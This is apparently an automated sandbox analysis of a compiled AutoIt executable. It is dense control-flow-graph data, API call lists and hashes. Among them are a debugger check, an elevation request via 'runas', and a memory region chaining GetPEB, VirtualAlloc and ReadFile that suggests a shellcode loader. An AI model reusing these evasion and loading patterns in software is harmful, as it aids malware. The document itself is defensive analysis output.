85903 41453a __fileno 67 API calls 85902->85903 85904 4148a0 85903->85904 85941 41c3cf 101 API calls 6 library calls 85904->85941 85907 41455e 85906->85907 85908 414549 85906->85908 85912 41efd4 85907->85912 85942 417f23 67 API calls __getptd_noexit 85908->85942 85910 41454e 85943 417ebb 6 API calls 2 library calls 85910->85943 85913 41efe0 __sopen_helper 85912->85913 85914 41f003 85913->85914 85915 41efe8 85913->85915 85916 41f011 85914->85916 85921 41f052 85914->85921 85964 417f36 67 API calls __getptd_noexit 85915->85964 85966 417f36 67 API calls __getptd_noexit 85916->85966 85919 41efed 85965 417f23 67 API calls __getptd_noexit 85919->85965 85920 41f016 85967 417f23 67 API calls __getptd_noexit 85920->85967 85944 41ba3b 85921->85944 85925 41f01d 85968 417ebb 6 API calls 2 library calls 85925->85968 85926 41f058 85928 41f065 85926->85928 85929 41f07b 85926->85929 85954 41ef5f 85928->85954 85969 417f23 67 API calls __getptd_noexit 85929->85969 85931 41eff5 __sopen_helper 85931->85874 85933 41f073 85971 41f0a6 LeaveCriticalSection __unlock_fhandle 85933->85971 85934 41f080 85970 417f36 67 API calls __getptd_noexit 85934->85970 85937->85874 85938->85888 85940->85899 85941->85901 85942->85910 85946 41ba47 __sopen_helper 85944->85946 85945 41baa2 85947 41bac4 __sopen_helper 85945->85947 85948 41baa7 EnterCriticalSection 85945->85948 85946->85945 85949 418407 __lock 67 API calls 85946->85949 85947->85926 85948->85947 85950 41ba73 85949->85950 85951 41ba8a 85950->85951 85952 4189e6 __ioinit InitializeCriticalSectionAndSpinCount 85950->85952 85953 41bad2 ___lock_fhandle LeaveCriticalSection 85951->85953 85952->85951 85953->85945 85955 41b9c4 __close_nolock 67 API calls 85954->85955 85956 41ef6e 85955->85956 85957 41ef84 SetFilePointer 85956->85957 85958 41ef74 85956->85958 85960 41efa3 85957->85960 85961 41ef9b GetLastError 85957->85961 85959 417f23 __wcsnicmp_l 67 API calls 85958->85959 85963 41ef79 85959->85963 85962 417f49 __dosmaperr 67 API calls 85960->85962 
85960->85963 85961->85960 85962->85963 85963->85933 85964->85919 85965->85931 85966->85920 85967->85925 85969->85934 85970->85933 85971->85931 85973 414e31 85972->85973 85974 414e4d 85972->85974 86018 417f23 67 API calls __getptd_noexit 85973->86018 85976 414e46 85974->85976 85978 41486c __flush 101 API calls 85974->85978 85990 414f08 LeaveCriticalSection LeaveCriticalSection _fseek 85976->85990 85977 414e36 86019 417ebb 6 API calls 2 library calls 85977->86019 85980 414e59 85978->85980 85991 41e680 85980->85991 85983 41453a __fileno 67 API calls 85984 414e67 85983->85984 85995 41e5b3 85984->85995 85986 414e6d 85986->85976 85987 413a88 __fclose_nolock 67 API calls 85986->85987 85987->85976 85988->85720 85990->85726 85992 41e690 85991->85992 85993 414e61 85991->85993 85992->85993 85994 413a88 __fclose_nolock 67 API calls 85992->85994 85993->85983 85994->85993 85996 41e5bf __sopen_helper 85995->85996 85997 41e5c7 85996->85997 85999 41e5e2 85996->85999 86035 417f36 67 API calls __getptd_noexit 85997->86035 85998 41e5f0 86037 417f36 67 API calls __getptd_noexit 85998->86037 85999->85998 86004 41e631 85999->86004 86002 41e5cc 86036 417f23 67 API calls __getptd_noexit 86002->86036 86003 41e5f5 86038 417f23 67 API calls __getptd_noexit 86003->86038 86007 41ba3b ___lock_fhandle 68 API calls 86004->86007 86009 41e637 86007->86009 86008 41e5fc 86039 417ebb 6 API calls 2 library calls 86008->86039 86011 41e652 86009->86011 86012 41e644 86009->86012 86040 417f23 67 API calls __getptd_noexit 86011->86040 86020 41e517 86012->86020 86014 41e5d4 __sopen_helper 86014->85986 86016 41e64c 86041 41e676 LeaveCriticalSection __unlock_fhandle 86016->86041 86018->85977 86042 41b9c4 86020->86042 86022 41e527 86023 41e57d 86022->86023 86025 41e55b 86022->86025 86028 41b9c4 __close_nolock 67 API calls 86022->86028 86055 41b93e 68 API calls 2 library calls 86023->86055 86025->86023 86026 41b9c4 __close_nolock 67 API calls 86025->86026 86029 41e567 CloseHandle 86026->86029 86027 41e585 86030 
41e5a7 86027->86030 86056 417f49 67 API calls 3 library calls 86027->86056 86031 41e552 86028->86031 86029->86023 86032 41e573 GetLastError 86029->86032 86030->86016 86034 41b9c4 __close_nolock 67 API calls 86031->86034 86032->86023 86034->86025 86035->86002 86036->86014 86037->86003 86038->86008 86040->86016 86041->86014 86043 41b9d1 86042->86043 86044 41b9e9 86042->86044 86045 417f36 __close 67 API calls 86043->86045 86047 417f36 __close 67 API calls 86044->86047 86049 41ba2e 86044->86049 86046 41b9d6 86045->86046 86048 417f23 __wcsnicmp_l 67 API calls 86046->86048 86050 41ba17 86047->86050 86051 41b9de 86048->86051 86049->86022 86052 417f23 __wcsnicmp_l 67 API calls 86050->86052 86051->86022 86053 41ba1e 86052->86053 86054 417ebb __wcsnicmp_l 6 API calls 86053->86054 86054->86049 86055->86027 86056->86030 86058 415126 __sopen_helper 86057->86058 86059 41513a _memset 86058->86059 86060 41516f 86058->86060 86061 415164 __sopen_helper 86058->86061 86086 417f23 67 API calls __getptd_noexit 86059->86086 86062 415965 __lock_file 68 API calls 86060->86062 86061->85730 86064 415177 86062->86064 86070 414f10 86064->86070 86065 415154 86087 417ebb 6 API calls 2 library calls 86065->86087 86072 414f2e _memset 86070->86072 86076 414f4c 86070->86076 86071 414f37 86139 417f23 67 API calls __getptd_noexit 86071->86139 86072->86071 86072->86076 86082 414f8b 86072->86082 86074 414f3c 86140 417ebb 6 API calls 2 library calls 86074->86140 86088 4151a6 LeaveCriticalSection LeaveCriticalSection _fseek 86076->86088 86078 4150d5 _memset 86143 417f23 67 API calls __getptd_noexit 86078->86143 86079 4150a9 _memset 86142 417f23 67 API calls __getptd_noexit 86079->86142 86080 41453a __fileno 67 API calls 86080->86082 86082->86076 86082->86078 86082->86079 86082->86080 86089 41ed9e 86082->86089 86119 41e6b1 86082->86119 86141 41ee9b 67 API calls 3 library calls 86082->86141 86086->86065 86088->86061 86090 41edaa __sopen_helper 86089->86090 86091 41edb2 86090->86091 86092 41edcd 86090->86092 
86213 417f36 67 API calls __getptd_noexit 86091->86213 86093 41eddb 86092->86093 86098 41ee1c 86092->86098 86215 417f36 67 API calls __getptd_noexit 86093->86215 86096 41edb7 86214 417f23 67 API calls __getptd_noexit 86096->86214 86097 41ede0 86216 417f23 67 API calls __getptd_noexit 86097->86216 86101 41ee29 86098->86101 86102 41ee3d 86098->86102 86218 417f36 67 API calls __getptd_noexit 86101->86218 86103 41ba3b ___lock_fhandle 68 API calls 86102->86103 86105 41ee43 86103->86105 86107 41ee50 86105->86107 86108 41ee66 86105->86108 86106 41ee2e 86219 417f23 67 API calls __getptd_noexit 86106->86219 86144 41e7dc 86107->86144 86220 417f23 67 API calls __getptd_noexit 86108->86220 86111 41edbf __sopen_helper 86111->86082 86114 41ede7 86217 417ebb 6 API calls 2 library calls 86114->86217 86115 41ee5e 86222 41ee91 LeaveCriticalSection __unlock_fhandle 86115->86222 86116 41ee6b 86221 417f36 67 API calls __getptd_noexit 86116->86221 86120 41e6c1 86119->86120 86124 41e6de 86119->86124 86226 417f23 67 API calls __getptd_noexit 86120->86226 86122 41e6c6 86227 417ebb 6 API calls 2 library calls 86122->86227 86125 41e713 86124->86125 86131 41e6d6 86124->86131 86223 423600 86124->86223 86127 41453a __fileno 67 API calls 86125->86127 86128 41e727 86127->86128 86129 41ed9e __read 79 API calls 86128->86129 86130 41e72e 86129->86130 86130->86131 86132 41453a __fileno 67 API calls 86130->86132 86131->86082 86133 41e751 86132->86133 86133->86131 86134 41453a __fileno 67 API calls 86133->86134 86135 41e75d 86134->86135 86135->86131 86136 41453a __fileno 67 API calls 86135->86136 86137 41e769 86136->86137 86138 41453a __fileno 67 API calls 86137->86138 86138->86131 86139->86074 86141->86082 86142->86074 86143->86074 86145 41e813 86144->86145 86146 41e7f8 86144->86146 86148 41e822 86145->86148 86150 41e849 86145->86150 86147 417f36 __close 67 API calls 86146->86147 86149 41e7fd 86147->86149 86151 417f36 __close 67 API calls 86148->86151 86153 417f23 __wcsnicmp_l 67 API calls 
86149->86153 86152 41e868 86150->86152 86167 41e87c 86150->86167 86154 41e827 86151->86154 86155 417f36 __close 67 API calls 86152->86155 86156 41e805 86153->86156 86158 417f23 __wcsnicmp_l 67 API calls 86154->86158 86160 41e86d 86155->86160 86156->86115 86157 41e8d4 86159 417f36 __close 67 API calls 86157->86159 86161 41e82e 86158->86161 86163 41e8d9 86159->86163 86164 417f23 __wcsnicmp_l 67 API calls 86160->86164 86162 417ebb __wcsnicmp_l 6 API calls 86161->86162 86162->86156 86165 417f23 __wcsnicmp_l 67 API calls 86163->86165 86166 41e874 86164->86166 86165->86166 86170 417ebb __wcsnicmp_l 6 API calls 86166->86170 86167->86156 86167->86157 86168 41e8b0 86167->86168 86169 41e8f5 86167->86169 86168->86157 86171 41e8bb ReadFile 86168->86171 86173 416fb6 __malloc_crt 67 API calls 86169->86173 86170->86156 86174 41ed62 GetLastError 86171->86174 86175 41e9e7 86171->86175 86176 41e90b 86173->86176 86177 41ebe8 86174->86177 86178 41ed6f 86174->86178 86175->86174 86182 41e9fb 86175->86182 86179 41e931 86176->86179 86180 41e913 86176->86180 86186 417f49 __dosmaperr 67 API calls 86177->86186 86192 41eb6d 86177->86192 86184 417f23 __wcsnicmp_l 67 API calls 86178->86184 86183 423462 __lseeki64_nolock 69 API calls 86179->86183 86181 417f23 __wcsnicmp_l 67 API calls 86180->86181 86185 41e918 86181->86185 86182->86192 86193 41ea17 86182->86193 86196 41ec2d 86182->86196 86187 41e93d 86183->86187 86188 41ed74 86184->86188 86190 417f36 __close 67 API calls 86185->86190 86186->86192 86187->86171 86189 417f36 __close 67 API calls 86188->86189 86189->86192 86190->86156 86191 413a88 __fclose_nolock 67 API calls 86191->86156 86192->86156 86192->86191 86194 41ea7d ReadFile 86193->86194 86203 41eafa 86193->86203 86197 41ea9b GetLastError 86194->86197 86205 41eaa5 86194->86205 86195 41eca5 ReadFile 86198 41ecc4 GetLastError 86195->86198 86206 41ecce 86195->86206 86196->86192 86196->86195 86197->86193 86197->86205 86198->86196 86198->86206 86199 41ebbe MultiByteToWideChar 86199->86192 
86200 41ebe2 GetLastError 86199->86200 86200->86177 86201 41eb75 86208 41eb32 86201->86208 86209 41ebac 86201->86209 86202 41eb68 86204 417f23 __wcsnicmp_l 67 API calls 86202->86204 86203->86192 86203->86201 86203->86202 86203->86208 86204->86192 86205->86193 86210 423462 __lseeki64_nolock 69 API calls 86205->86210 86206->86196 86207 423462 __lseeki64_nolock 69 API calls 86206->86207 86207->86206 86208->86199 86211 423462 __lseeki64_nolock 69 API calls 86209->86211 86210->86205 86212 41ebbb 86211->86212 86212->86199 86213->86096 86214->86111 86215->86097 86216->86114 86218->86106 86219->86114 86220->86116 86221->86115 86222->86111 86224 416fb6 __malloc_crt 67 API calls 86223->86224 86225 423615 86224->86225 86225->86125 86226->86122 86231 414cef GetSystemTimeAsFileTime __aulldiv 86228->86231 86230 4431ef 86230->85733 86231->86230 86232->85740 86234->85746 86239 4523e1 _wcscpy 86235->86239 86236 4151b0 81 API calls __fread_nolock 86236->86239 86237 44afdc GetSystemTimeAsFileTime 86237->86239 86238 452553 86238->85655 86238->85656 86239->86236 86239->86237 86239->86238 86240 41557c 105 API calls _fseek 86239->86240 86240->86239 86242 44b1b4 86241->86242 86243 44b1a6 86241->86243 86245 44b1ca 86242->86245 86246 414e06 138 API calls 86242->86246 86247 44b1c2 86242->86247 86244 414e06 138 API calls 86243->86244 86244->86242 86276 4352d1 81 API calls 2 library calls 86245->86276 86248 44b2c1 86246->86248 86247->85683 86248->86245 86250 44b2cf 86248->86250 86255 414e94 __fcloseall 106 API calls 86250->86255 86259 44b2dc 86250->86259 86251 44b20d 86252 44b211 86251->86252 86253 44b23b 86251->86253 86254 44b21e 86252->86254 86257 414e94 __fcloseall 106 API calls 86252->86257 86277 43526e 86253->86277 86258 44b22e 86254->86258 86261 414e94 __fcloseall 106 API calls 86254->86261 86255->86259 86257->86254 86258->85683 86259->85683 86260 44b242 86262 44b270 86260->86262 86263 44b248 86260->86263 86261->86258 86287 44b0af 111 API calls 86262->86287 86265 44b255 86263->86265 
[Control-flow graph for the function at 0x409A40 and the subgraphs reachable from it. The page carried only the node/edge list of the interactive graph widget, which is not reproduced. Recoverable information from that data: the graph covers the image's own code and its CRT helpers (_malloc, _wcslen, _wcscpy, _memcpy_s, _strcat, __wcsicoll, _printf, __fcloseall, __fclose_nolock, __cinit, and the bad_alloc/bad_exception throw path behind 0x41171A) and the Windows APIs VariantClear, VariantInit, VariantCopy, CharUpperBuffW, SHGetDesktopFolder, SHGetPathFromIDListW, WaitForSingleObject, GetExitCodeProcess, CloseHandle, Sleep, timeGetTime, TranslateMessage, DispatchMessageW, TranslateAcceleratorW, IsDialogMessageW, GetClassLongW, CreateFileW, SetFilePointerEx, LoadLibraryA, LoadLibraryW, GetProcAddress, FreeLibrary, GetCurrentProcess, TerminateProcess, GetVersionExW, GetSystemInfo, GetNativeSystemInfo and VirtualProtect (call site 0x410DED). A separate region at 0x538E3C0, outside the 0x400000 module image listed under Memory Dump Source, chains GetPEB (0x538F4C0), Sleep, CreateFileW, VirtualAlloc, ReadFile and ExitProcess.]
APIs
• _wcslen.LIBCMT ref: 00409A61
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
• CharUpperBuffW.USER32(?,?), ref: 00409AF5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID: 0vH$4RH
• API String ID: 1143807570-2085553193
• Opcode ID: 99d1197353860daa2513f82cc2f46b4e9eeffbfa9250308b68df757a7373a6ee
• Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
• Opcode Fuzzy Hash: 99d1197353860daa2513f82cc2f46b4e9eeffbfa9250308b68df757a7373a6ee
• Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
  • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\AENiBH7X1q.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
  • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
• IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
• GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\AENiBH7X1q.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
  • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
• SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\AENiBH7X1q.exe,00000004), ref: 0040D7D6
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\AENiBH7X1q.exe,00000004), ref: 00431B0E
                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\AENiBH7X1q.exe,00000004), ref: 00431B3F
                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                                                                                                                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @GH$@GH$C:\Users\user\Desktop\AENiBH7X1q.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2493088469-1060904090
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E

                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 1254 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 1263 40e506-40e509 1254->1263 1264 42accc-42acd1 1254->1264 1267 40e540-40e555 call 40ee70 1263->1267 1268 40e50b-40e51c 1263->1268 1265 42acd3-42acdb 1264->1265 1266 42acdd-42ace0 1264->1266 1269 42ad12-42ad20 1265->1269 1270 42ace2-42aceb 1266->1270 1271 42aced-42acf0 1266->1271 1285 40e557-40e573 GetCurrentProcess call 40ee30 1267->1285 1286 40e579-40e5a8 1267->1286 1272 40e522-40e525 1268->1272 1273 42ac9b-42aca7 1268->1273 1284 42ad28-42ad2d GetSystemInfo 1269->1284 1270->1269 1271->1269 1275 42acf2-42ad06 1271->1275 1272->1267 1276 40e527-40e537 1272->1276 1278 42acb2-42acba 1273->1278 1279 42aca9-42acad 1273->1279 1280 42ad08-42ad0c 1275->1280 1281 42ad0e 1275->1281 1282 42acbf-42acc7 1276->1282 1283 40e53d 1276->1283 1278->1267 1279->1267 1280->1269 1281->1269 1282->1267 1283->1267 1287 42ad38-42ad3d GetSystemInfo 1284->1287 1285->1286 1295 40e575 1285->1295 1286->1287 1288 40e5ae-40e5c3 call 40eee0 1286->1288 1288->1284 1294 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 1288->1294 1298 40e5e0-40e5ef 1294->1298 1299 40e5dd-40e5de FreeLibrary 1294->1299 1295->1286 1300 40e5f1-40e5f2 FreeLibrary 1298->1300 1301 40e5f4-40e5ff 1298->1301 1299->1298 1300->1301
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                                                                                                                                                                                                                                                                                                                                                                • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
• String ID: pMH
• API String ID: 2923339712-2522892712
• Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
• Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
• Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
• Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
APIs
• LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
• GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: IsThemeActive$uxtheme.dll
• API String ID: 2574300362-3542929980
• Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
• Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
• Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
• Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28

Control-flow Graph

APIs
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
• __wsplitpath.LIBCMT ref: 00410C61
  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
• _wcsncat.LIBCMT ref: 00410C78
• __wmakepath.LIBCMT ref: 00410C94
  • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
• _wcscpy.LIBCMT ref: 00410CCC
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
• RegQueryValueExW.ADVAPI32 ref: 00429BE4
• _wcscat.LIBCMT ref: 00429C43
• _wcslen.LIBCMT ref: 00429C55
• _wcslen.LIBCMT ref: 00429C66
• _wcscat.LIBCMT ref: 00429C80
• _wcsncpy.LIBCMT ref: 00429CC0
• RegCloseKey.ADVAPI32(?), ref: 00429CDE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID: Include$Software\AutoIt v3\AutoIt$\
• API String ID: 1004883554-2276155026
• Opcode ID: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
• Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
